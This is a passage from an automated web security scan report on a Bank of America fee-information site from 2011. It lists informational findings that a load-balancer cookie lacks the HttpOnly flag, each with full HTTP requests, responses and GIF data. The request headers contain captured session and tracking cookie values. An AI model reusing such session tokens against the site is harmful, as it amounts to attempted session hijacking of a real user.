Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:24 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1d1-31c-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 796
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:24 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:24 GMT;path=/

GIF89a......................................................................................................!.......,.......@....0.5.c.l..0.$...#.0.=.7........#.X. ..(@x....$....... ...
f#.`9.LC...
...[SNIP]...

4.40. http://factsaboutfees.bankofamerica.com/assets/img/nav3_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/nav3_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/nav3_off.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:02 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c1ce-50c-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 1292
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:02 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

GIF89a.........................................=..=..=..=..=..<..<. <.-K.-K..K..K./K./J./J.0J.0J.=Y.=Y.>Y.>Y.?X.?Y.?X.@X.Nf.Nf.Nf.Nf.Nf.Nf.Of.Of.Of.Pf.Pf.^t.^t.^t._t._t._t.`t.n..n..n..n..n..o..o..o..
...[SNIP]...

4.41. http://factsaboutfees.bankofamerica.com/assets/img/nav4_off.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/nav4_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/nav4_off.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:02 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1f8-415-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 1045
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:02 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:02 GMT;path=/

GIF89ah.....................................=..=..=..=..=..<..<. <.-K.-K..K..K./K./J./J.0J.0J.=Y.=Y.>Y.>Y.?X.?Y.?X.@X.Nf.Nf.Nf.Nf.Nf.Of.Of.Of.Pf.Pf.^t.^t.^t.^t._t._t.`t.n..n..n..o..o..o..p..~..~..~..
...[SNIP]...

4.42. http://factsaboutfees.bankofamerica.com/assets/img/navBar_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/navBar_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/navBar_bg.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:00 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1e3-10c-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 268
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:00 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:00 GMT;path=/

GIF89a..,........... /. /.
/.
/.
/.
/.
/../../../../../.././././../../../../.........................................................................................................................
...[SNIP]...

4.43. http://factsaboutfees.bankofamerica.com/assets/img/noflash.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/noflash.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/noflash.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:03 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1db-930-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 2352
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:03 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:03 GMT;path=/

GIF89a.............!... ...,.............................H...........L..........
.....L*.... .J......j............N....................(8HXhx..........)9IYiy........ .*:JZjz........
.+;K[k{..........
...[SNIP]...

4.44. http://factsaboutfees.bankofamerica.com/assets/img/spacer.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/spacer.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; 